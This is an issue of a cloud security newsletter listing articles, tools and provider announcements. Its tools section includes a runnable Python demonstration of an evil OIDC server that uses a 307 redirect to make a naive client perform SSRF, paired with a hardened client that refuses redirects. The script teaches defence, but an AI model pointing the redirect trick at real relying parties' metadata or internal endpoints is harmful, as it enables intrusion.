Release Date: 23/10/2022 | Issue: 160
CloudSecList is a newsletter for busy professionals who want to keep up to date with the cloud security industry. Hand-curated by Marco Lancini.

If you received it, you either subscribed or someone forwarded it to you. If you fit in the latter camp and want to subscribe, you can do so via the Sign Up button.

📄 Software Composition Analysis Checklist 📄
Learn the 6 key components of any complete, robust software composition analysis (SCA) solution in this SCA checklist. Inside, you’ll see why not all SCA solutions are created equal, and you’ll learn how your organization can maintain holistic cloud-native security and compliance. Plus, you’ll get insights into:
  • Key SCA features you should look out for while evaluating solutions
  • Tips for mitigating common security and compliance risks
  • The benefits of a context-aware, developer-first approach to SCA
  • And more!
Get the SCA Checklist for free!

This week's articles

The Danger of Falling to System Role in AWS SDK Client   #attack, #aws
Writeup of a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an "Import Data From S3" functionality.

How to list all resources in your AWS account   #aws, #defend
You may have been there before: you got access to an AWS account and just want to list which resources are configured in it. The seemingly simple task of listing all resources quickly turns out to be complicated.

Untangling Azure Active Directory Principals & Access Permissions   #azure, #iam
Post untangling the question of 'who has access to what' in an Azure Active Directory environment. A PowerShell tool was also released to automatically enumerate this.

Azure Active Directory - Security Overview   #azure, #explain
A nice diagram providing an overview of the endpoints/integrations/connections/features in the Azure AD ecosystem.

PCI Compliance for Kubernetes in detail - Part 3 - Workload Security   #kubernetes, #defend
This is the third part of an in-depth look at how companies running Kubernetes can approach implementing the recommendations of PCI's guidance for container orchestration.

Guide to AWS Lambda Function URLs   #aws, #build, #explain
Post explaining AWS Lambda Function URLs, a new feature of AWS Lambda that lets you invoke a function over an HTTPS endpoint without putting an API Gateway in front of it.

FabriXss: How We Managed to Abuse a Custom Role User Using CSTI and Stored XSS in Azure Fabric Explorer   #attack, #azure
The Orca Research Pod discovered FabriXss, a vulnerability in Azure Service Fabric Explorer that allows an attacker starting from a custom-role user to gain full Administrator permissions.

Enrich AWS account data in Microsoft Sentinel   #aws, #azure, #monitor
As organisations are integrating Amazon Web Services data sources with Microsoft Sentinel, many are facing a common problem: how to identify AWS resources and handle contextual data such as AWS account information for alerts and incidents?

Pod Security Policies are dead, long live Pod Security Admission!   #defend, #kubernetes
How can we enforce security best practices at cluster or namespace level now that Pod Security Policies are gone?


Inspect a container image's root CAs. You can also refer to the companion blog post.

Automation to assess the state of your M365 tenant against CISA's baselines.

Evil OIDC server: its OpenID Configuration URL answers with a 307 redirect, so a relying party that follows it performs an SSRF on the attacker's behalf.
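The redirect trick behind that tool, as an added example that is not the tool's own code: a constructed stand-in for an evil provider whose discovery URL answers with a 307, a naive relying party that follows it and so fetches whatever the Location header names, and a strict one that refuses any redirect during discovery and checks the issuer claim. The hosts, paths and payloads are constructed for the demo; the "internal" endpoint lives on the same local server only so the script runs offline.

```python
"""Added example (not part of the original tool): an "evil" OIDC discovery
endpoint that replies to the openid-configuration request with a 307, beside a
naive client that follows it (SSRF) and a strict client that refuses redirects
and validates the issuer. Hosts, paths and payloads are constructed."""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed: stands in for an internal-only endpoint (metadata service, admin
# API) that the relying party can reach but the attacker cannot.
INTERNAL_PATH = "/internal/metadata"
INTERNAL_BODY = {"note": "constructed internal-only response"}
DISCOVERY_PATH = "/.well-known/openid-configuration"


class EvilOidcHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        host, port = self.server.server_address[:2]
        if self.path == DISCOVERY_PATH:
            # No discovery document is ever served; the client is bounced instead.
            self.send_response(307)
            self.send_header("Location", f"http://{host}:{port}{INTERNAL_PATH}")
            self.end_headers()
        elif self.path == INTERNAL_PATH:
            body = json.dumps(INTERNAL_BODY).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_evil_provider():
    """Bind the evil provider on a free loopback port and serve it in a thread."""
    server = HTTPServer(("127.0.0.1", 0), EvilOidcHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address[:2]
    return server, f"http://{host}:{port}"


def discover_naive(issuer):
    """Vulnerable: urllib follows the 307, so whatever the redirect points at is
    fetched from the relying party's network position and returned as the
    'discovery document'."""
    with urllib.request.urlopen(issuer.rstrip("/") + DISCOVERY_PATH, timeout=5) as resp:
        return json.load(resp)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # every 3xx becomes an HTTPError instead of a new request


def discover_strict(issuer):
    """Hardened: refuse redirects during discovery and require the document's
    issuer to equal the configured one (OpenID Connect Discovery 1.0, 4.3)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(issuer.rstrip("/") + DISCOVERY_PATH, timeout=5) as resp:
            doc = json.load(resp)
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            raise ValueError(f"discovery must not redirect (got {err.code})") from err
        raise
    if doc.get("issuer") != issuer:
        raise ValueError("issuer mismatch in discovery document")
    return doc


def run_demo():
    """Return (what the naive client fetched, why the strict client refused)."""
    server, issuer = start_evil_provider()
    try:
        leaked = discover_naive(issuer)  # SSRF: the internal body comes back
        try:
            discover_strict(issuer)
            blocked = None
        except ValueError as err:
            blocked = str(err)
    finally:
        server.shutdown()
        server.server_close()
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = run_demo()
    print("naive client fetched:", leaked)
    print("strict client refused:", blocked)
```

In a real attack the Location header points at something only the relying party can reach, such as a cloud metadata endpoint or an internal admin API; the hardened client should additionally pin discovery to HTTPS and to the expected host, and reject non-JSON or oversized responses.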

A Terraform module for configuring Workload Identity for GKE clusters.

I'm writing a book! 📖
The CloudSec Engineer will be a book on how to enter, establish yourself, and thrive in the cloud security industry as an individual contributor.
You can sign up to get updates and free samples of the book as I write it at:

From the cloud providers

AWS: Announcing AWS Parameters and Secrets Lambda Extension
AWS launched the AWS Parameters and Secrets Lambda Extension, a convenient method for AWS Lambda users to retrieve parameters from AWS Systems Manager Parameter Store and secrets from AWS Secrets Manager.

AWS: Amazon Detective helps reduce time to investigate Amazon GuardDuty findings by grouping related findings
Detective now uses machine learning (ML) to group related GuardDuty findings that, in isolation, may have been ignored but show the lifecycle of an attack, which can help security analysts identify advanced threats more efficiently.

AWS: Analyze Amazon Cognito advanced security intelligence to improve visibility and protection
How to analyze security intelligence from Amazon Cognito advanced security features logs by using AWS native services.

GCP: Best kept security secrets: How Cloud EKM can help resolve the cloud trust paradox
Cloud EKM can help protect data at rest with encryption keys which are stored and managed in a third-party key management system that's outside Google Cloud's infrastructure, and ultimately outside Google's control.

GCP: Backup for GKE
Backup for GKE is a service for backing up and restoring workloads in GKE clusters.

Azure: Overview of the Microsoft cloud security benchmark
The Microsoft cloud security benchmark (MCSB) provides prescriptive best practices and recommendations to help improve the security of workloads, data, and services on Azure and your multi-cloud environment.

Azure: Announcing Azure DNS Private Resolver general availability
Azure DNS Private Resolver now provides a fully managed recursive resolution and conditional forwarding service for Azure virtual networks.

Thanks for reading!

If you found this newsletter helpful, I'd really appreciate if you could forward it to your friends and colleagues! 👌

If you have questions, comments, or feedback, let me know on Twitter (@lancinimarco / @CloudSecList), or at!



© 2019-present, CloudSecList by Marco Lancini.